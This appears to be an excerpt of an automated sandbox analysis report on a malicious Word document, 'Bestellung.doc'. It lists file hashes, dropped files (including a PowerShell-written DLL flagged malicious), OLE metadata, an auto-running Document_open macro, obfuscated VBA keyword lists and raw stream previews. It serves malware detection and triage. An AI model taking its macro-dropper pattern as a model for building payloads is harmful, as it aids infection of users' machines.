                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):628447
                                                                Entropy (8bit):6.912338352754585
                                                                Encrypted:false
                                                                SSDEEP:12288:iYzchQVZnkmt/70MWugxPJZFpf0c1pHAbdJxUR9rNXZL4:t4KV5Hpt8bZHL4nM919
                                                                MD5:AAB0A07CC43D3668060B276D2CADA799
                                                                SHA1:0DB1EFC93F344EC0172E33CC168417495B6A1698
                                                                SHA-256:F87BEED935FBE173F635CA3574F4B18EC1657941DA9778C448339ECACBF35698
                                                                SHA-512:319A38BD51A57E21322B239E6ABD90BEBFD1F86D7C3928441600DEC4D610C7F599F2AC160E16D24C269CBA9919FE92020408B28AD6C2ABC702DC00507C04B9FD
                                                                Malicious:true
                                                                Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...
                                                                C:\Users\user\Desktop\~$stellung.doc
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.431160061181642
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                Malicious:false
                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                                                Static File Info

                                                                General

                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Quaerat sint enim doloribus doloribus eaque blanditiis fugiat debitis. Quis quis similique eum. Veniam doloribus necessitatibus sunt qui non assumenda quas. Minima ut magni non., Author: Monserrat Kanea, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:18:00 2021, Last Saved Time/Date: Mon Jan 25 09:18:00 2021, Number of Pages: 1, Number of Words: 5366, Number of Characters: 30587, Security: 8
                                                                Entropy (8bit):6.255456963718578
                                                                TrID:
                                                                • Microsoft Word document (32009/1) 79.99%
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                File name:Bestellung.doc
                                                                File size:144896
                                                                MD5:268e0826d78c069d3834a8203a44af4f
                                                                SHA1:5f14c1a62195af4f3018b57d097876fb41da7937
                                                                SHA256:f9f3c11c9f92d92d74eb40958a14d97f0f36497b6c86109b237628815642102a
                                                                SHA512:32e64cac805cfcb78cd72936176ef0d7e8951c10b810ad0799e4d89ce6475e3ee7c1c000ab4af07bf28a1fbb2ce7849ebf887c41a3cb4b372ae4bebf58ee9f9e
                                                                SSDEEP:1536:dNpHZTgQSz4w4K0vOYOcc2bqrQF7khnKBf1HxiQk:V1gQSU3K0hzqrQFwh8Hy
                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                File Icon

                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                Static OLE Info

                                                                General

                                                                Document Type:OLE
                                                                Number of OLE Files:1

                                                                OLE File "Bestellung.doc"

                                                                Indicators

                                                                Has Summary Info:True
                                                                Application Name:Microsoft Office Word
                                                                Encrypted Document:False
                                                                Contains Word Document Stream:True
                                                                Contains Workbook/Book Stream:False
                                                                Contains PowerPoint Document Stream:False
                                                                Contains Visio Document Stream:False
                                                                Contains ObjectPool Stream:
                                                                Flash Objects Count:
                                                                Contains VBA Macros:True

                                                                Summary

                                                                Code Page:1252
                                                                Title:Quaerat sint enim doloribus doloribus eaque blanditiis fugiat debitis. Quis quis similique eum. Veniam doloribus necessitatibus sunt qui non assumenda quas. Minima ut magni non.
                                                                Subject:
                                                                Author:Monserrat Kanea
                                                                Keywords:
                                                                Comments:
                                                                Template:
                                                                Last Saved By:
                                                                Revion Number:1
                                                                Total Edit Time:0
                                                                Create Time:2021-01-25 09:18:00
                                                                Last Saved Time:2021-01-25 09:18:00
                                                                Number of Pages:1
                                                                Number of Words:5366
                                                                Number of Characters:30587
                                                                Creating Application:Microsoft Office Word
                                                                Security:8

                                                                Document Summary

                                                                Document Code Page:-535
                                                                Number of Lines:254
                                                                Number of Paragraphs:71
                                                                Thumbnail Scaling Desired:False
                                                                Company:Ramos e Hijos
                                                                Contains Dirty Links:False
                                                                Shared Document:False
                                                                Changed Hyperlinks:False
                                                                Application Version:917504

                                                                Streams with VBA

                                                                VBA File Name: Jlzk8qsqcshl6jk, Stream Size: 14594
                                                                General
                                                                Stream Path:Macros/VBA/Jlzk8qsqcshl6jk
                                                                VBA File Name:Jlzk8qsqcshl6jk
                                                                Stream Size:14594
                                                                Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 45 ed dd ee 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                VBA Code Keywords

                                                                Keyword
                                                                RzBkG
                                                                Array((IcMvJH),
                                                                woXMHFAWj:
                                                                ndrons
                                                                zaPgDlYE
                                                                wefyBED
                                                                EBzng
                                                                TTSSDBE)
                                                                ihJfBp
                                                                Array((KTwdM),
                                                                Const
                                                                tfUFkPBI
                                                                frXBRIAUC)
                                                                ZDFvjGA
                                                                BkXdJC
                                                                Resume
                                                                YoONRCDR
                                                                Split(OhlNFI,
                                                                VGJvOIo
                                                                HKGPhf()
                                                                Array((RCizEteb),
                                                                Array((YoONRCDR),
                                                                Array((tTYAKI),
                                                                VGJvOIo:
                                                                gHvzZ
                                                                Ikdha
                                                                AndgBCK()
                                                                dGHeiB)
                                                                IfwvovBbI:
                                                                AndgBCK
                                                                nXOBD
                                                                LPhmsCuzH
                                                                hpBCIH
                                                                Array((RPnSaCJu),
                                                                zWNhsCZ
                                                                mxkikw
                                                                "ndpns
                                                                wPwsfD
                                                                zrdcAzBue)
                                                                pqwm,
                                                                VCOQBBJME
                                                                Array((cujVJONG),
                                                                qabazEA
                                                                SdmZKHA
                                                                Array((jvKCCCN),
                                                                xqRcJHJC
                                                                bvWlGF
                                                                Array((BjxaCGJ),
                                                                BJuiHE()
                                                                DfLwCIJs
                                                                Array((szAVCX),
                                                                YeFGHHg
                                                                cujVJONG
                                                                Array((QhLjEC),
                                                                UdmGIddWE
                                                                SwIwjFCGt
                                                                vXKNhR()
                                                                Array((nUCpSBGl),
                                                                IAZNKNFF
                                                                Range:
                                                                NjfVZEH
                                                                TtymyqHC
                                                                "*high*,*critic*"
                                                                RCizEteb
                                                                SdmZKHA:
                                                                RPnSaCJu
                                                                kqPZDRGh
                                                                xolsDFAoA
                                                                UdmGIddWE)
                                                                dxujxGCSH:
                                                                kzJQDGJE
                                                                eFJdCEIGJ
                                                                TmaaI)
                                                                GvzsBP
                                                                aspdJ
                                                                Split(eiWFHgJI,
                                                                BJuiHE
                                                                mjbBYHhbs
                                                                mgbUQB:
                                                                gFPNA()
                                                                aRiqA
                                                                VkIrTt
                                                                YqzDYkkZ
                                                                tFQrUF:
                                                                UByHC
                                                                FQbNABABD
                                                                JoWtI
                                                                String
                                                                BcOIJEb
                                                                LIhSwfESI
                                                                ymBRCJA
                                                                tFQrUF
                                                                dDVvDFyJ
                                                                Split(aspdJ,
                                                                AEmiPt
                                                                Nothing
                                                                GwCvEyD
                                                                Split(FwnlEcJ,
                                                                mgbUQB
                                                                HKGPhf
                                                                dDVvDFyJ:
                                                                PCZMFnb)
                                                                Nbpclsvfxustc,
                                                                nMrFDxBZ)
                                                                qabazEA:
                                                                Array((yoxbGFcFG),
                                                                qckhE
                                                                NRCfdB
                                                                fcMsqBqHS
                                                                WnGZXISGD
                                                                Split(zWNhsCZ,
                                                                mQJJC:
                                                                UFSXB
                                                                UFSXB)
                                                                KTwdM
                                                                Split(ymBRCJA,
                                                                frXBRIAUC
                                                                TWtrFHKBF
                                                                nd:wns
                                                                GpgYnI()
                                                                Array((IzaGEVCD),
                                                                CivKlI
                                                                NPikOxWEE)
                                                                tkDRHFKIL
                                                                kOGmA)
                                                                eFJdCEIGJ()
                                                                JHxtqF
                                                                NABiUJmBA
                                                                PCZMFnb
                                                                zrdcAzBue
                                                                Split(gzqiCG,
                                                                VkIrTt)
                                                                dxujxGCSH
                                                                gHvzZ)
                                                                NRCfdB)
                                                                UNxmoIDW()
                                                                ndgmns
                                                                BBKJHBtF
                                                                EBzng)
                                                                eBdxEG
                                                                AEmiPt:
                                                                Split(BkXdJC,
                                                                QTrqHnpVB
                                                                Split(QTrqHnpVB,
                                                                ndinns
                                                                kzJQDGJE()
                                                                Array((FQbNABABD),
                                                                Split(Ikdha,
                                                                LIhSwfESI()
                                                                nMrFDxBZ
                                                                Mid(skuwd,
                                                                Target)
                                                                tTYAKI
                                                                AsczD()
                                                                gFPNA
                                                                LIJNuGn
                                                                xqRcJHJC()
                                                                mpLEDLwAI)
                                                                tkDRHFKIL()
                                                                Split(kvSXRJ,
                                                                mpLEDLwAI
                                                                HJbpE:
                                                                FwnlEcJ
                                                                dGHeiB
                                                                xhvKHu
                                                                szAVCX
                                                                URsHL()
                                                                tllnMEB
                                                                Split(wefyBED,
                                                                Len(skuwd))
                                                                RoGdiLo
                                                                ZDFvjGA)
                                                                xolsDFAoA)
                                                                IAZNKNFF:
                                                                kvSXRJ
                                                                bhdApJCs
                                                                BjxaCGJ
                                                                Array((JoWtI),
                                                                Split(liXWDHf,
                                                                XCCUFUDF()
                                                                woXMHFAWj
                                                                Split(SwIwjFCGt,
                                                                Array((ODzQPrd),
                                                                Array((NABiUJmBA),
                                                                ndmns
                                                                Attribute
                                                                OhlNFI
                                                                uPBZMu
                                                                JHxtqF()
                                                                DOTbEvAC
                                                                aRiqA:
                                                                QhLjEC
                                                                Split(RoGdiLo,
                                                                URsHL
                                                                Split(wrBNJ,
                                                                ndsns
                                                                nUCpSBGl
                                                                OMnbClgE
                                                                NjfVZEH:
                                                                MemVBBC
                                                                Array((TWtrFHKBF),
                                                                WTESfHHbE
                                                                jvKCCCN
                                                                GwBkDZG
                                                                TmaaI
                                                                LIJNuGn:
                                                                RzBkG)
                                                                VB_Name
                                                                Content
                                                                uPBZMu:
                                                                Split(DOTbEvAC,
                                                                wxhyXoc
                                                                Array((GvzsBP),
                                                                Function
                                                                ODzQPrd
                                                                kYSmGCjDH
                                                                lJxIKkhCA
                                                                LPhmsCuzH()
                                                                OMnbClgE:
                                                                eiWFHgJI
                                                                Error
                                                                zaPgDlYE()
                                                                MFOcG
                                                                kOGmA
                                                                ndtns
                                                                Split(bvWlGF,
                                                                YeFGHHg:
                                                                UNxmoIDW
                                                                IcMvJH
                                                                nd_ns
                                                                bhdApJCs)
                                                                GpgYnI
                                                                NPikOxWEE
                                                                Array((nXOBD),
                                                                yoxbGFcFG
                                                                wGGXPWXvH
                                                                BcOIJEb:
                                                                IfwvovBbI
                                                                qckhE:
                                                                XCCUFUDF
                                                                gzqiCG
                                                                wrBNJ
                                                                Split(WnGZXISGD,
                                                                IzaGEVCD
                                                                Split(DfLwCIJs,
                                                                HJbpE
                                                                Split(wGGXPWXvH,
                                                                AsczD
                                                                DWDXCYzB
                                                                Mid(Application.Name,
                                                                tllnMEB()
                                                                mQJJC
                                                                fcMsqBqHS)
                                                                String:
                                                                liXWDHf
                                                                GwBkDZG()
                                                                vXKNhR
                                                                HiXlCAMl
                                                                skuwd
                                                                GwCvEyD()
                                                                TTSSDBE
                                                                VBA Code
                                                                VBA File Name: Pc1nzntniqj_dur51, Stream Size: 704
                                                                General
                                                                Stream Path:Macros/VBA/Pc1nzntniqj_dur51
                                                                VBA File Name:Pc1nzntniqj_dur51
                                                                Stream Size:704
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . E . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 45 ed c9 27 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                VBA Code Keywords

                                                                Keyword
                                                                Attribute
                                                                VB_Name
                                                                VBA Code
                                                                VBA File Name: Ynzysnuyyfihfq23d, Stream Size: 1174
                                                                General
                                                                Stream Path:Macros/VBA/Ynzysnuyyfihfq23d
                                                                VBA File Name:Ynzysnuyyfihfq23d
                                                                Stream Size:1174
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . c . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 45 ed 83 63 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                VBA Code Keywords

                                                                Keyword
                                                                False
                                                                Private
                                                                VB_Exposed
                                                                Attribute
                                                                VB_Name
                                                                VB_Creatable
                                                                Document_open()
                                                                VB_PredeclaredId
                                                                VB_GlobalNameSpace
                                                                VB_Base
                                                                VB_Customizable
                                                                VB_TemplateDerived
                                                                VBA Code

                                                                Streams

                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                General
                                                                Stream Path:\x1CompObj
                                                                File Type:data
                                                                Stream Size:146
                                                                Entropy:4.00187355764
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 308
                                                                General
                                                                Stream Path:\x5DocumentSummaryInformation
                                                                File Type:data
                                                                Stream Size:308
                                                                Entropy:2.92079753313
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 04 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 584
                                                                General
                                                                Stream Path:\x5SummaryInformation
                                                                File Type:data
                                                                Stream Size:584
                                                                Entropy:4.08441751167
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 18 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 5c 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                                                Stream Path: 1Table, File Type: data, Stream Size: 6881
                                                                General
                                                                Stream Path:1Table
                                                                File Type:data
                                                                Stream Size:6881
                                                                Entropy:6.01925086237
                                                                Base64 Encoded:True
                                                                Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 531
                                                                General
                                                                Stream Path:Macros/PROJECT
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Stream Size:531
                                                                Entropy:5.60149373099
                                                                Base64 Encoded:True
                                                                Data ASCII:I D = " { D C 6 D B B 0 F - 4 4 C C - 4 3 0 C - 8 E B 1 - D C E F F 4 E 8 4 C 3 4 } " . . D o c u m e n t = Y n z y s n u y y f i h f q 2 3 d / & H 0 0 0 0 0 0 0 0 . . M o d u l e = P c 1 n z n t n i q j _ d u r 5 1 . . M o d u l e = J l z k 8 q s q c s h l 6 j k . . E x e N a m e 3 2 = " R w 9 v _ p l t f h q t u 0 d 2 w " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F B F 9 B D 4 5 3 3 4 9 3 3 4 9 3 3 4 9 3 3 4
                                                                Data Raw:49 44 3d 22 7b 44 43 36 44 42 42 30 46 2d 34 34 43 43 2d 34 33 30 43 2d 38 45 42 31 2d 44 43 45 46 46 34 45 38 34 43 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 59 6e 7a 79 73 6e 75 79 79 66 69 68 66 71 32 33 64 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 50 63 31 6e 7a 6e 74 6e 69 71 6a 5f 64 75 72 35 31 0d 0a 4d 6f 64 75 6c 65 3d 4a 6c 7a 6b 38 71 73 71 63 73 68
                                                                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 158
                                                                General
                                                                Stream Path:Macros/PROJECTwm
                                                                File Type:data
                                                                Stream Size:158
                                                                Entropy:3.75845137034
                                                                Base64 Encoded:False
                                                                Data ASCII:Y n z y s n u y y f i h f q 2 3 d . Y . n . z . y . s . n . u . y . y . f . i . h . f . q . 2 . 3 . d . . . P c 1 n z n t n i q j _ d u r 5 1 . P . c . 1 . n . z . n . t . n . i . q . j . _ . d . u . r . 5 . 1 . . . J l z k 8 q s q c s h l 6 j k . J . l . z . k . 8 . q . s . q . c . s . h . l . 6 . j . k . . . . .
                                                                Data Raw:59 6e 7a 79 73 6e 75 79 79 66 69 68 66 71 32 33 64 00 59 00 6e 00 7a 00 79 00 73 00 6e 00 75 00 79 00 79 00 66 00 69 00 68 00 66 00 71 00 32 00 33 00 64 00 00 00 50 63 31 6e 7a 6e 74 6e 69 71 6a 5f 64 75 72 35 31 00 50 00 63 00 31 00 6e 00 7a 00 6e 00 74 00 6e 00 69 00 71 00 6a 00 5f 00 64 00 75 00 72 00 35 00 31 00 00 00 4a 6c 7a 6b 38 71 73 71 63 73 68 6c 36 6a 6b 00 4a 00 6c 00
                                                                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4827
                                                                General
                                                                Stream Path:Macros/VBA/_VBA_PROJECT
                                                                File Type:data
                                                                Stream Size:4827
                                                                Entropy:5.51290275717
                                                                Base64 Encoded:False
                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 637
                                                                General
                                                                Stream Path:Macros/VBA/dir
                                                                File Type:data
                                                                Stream Size:637
                                                                Entropy:6.3067929208
                                                                Base64 Encoded:True
                                                                Data ASCII:. y . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . k . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                                                Data Raw:01 79 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 13 6b fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                Stream Path: WordDocument, File Type: data, Stream Size: 95711
                                                                General
                                                                Stream Path:WordDocument
                                                                File Type:data
                                                                Stream Size:95711
                                                                Entropy:6.59080514362
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . q . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . b . . . b . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
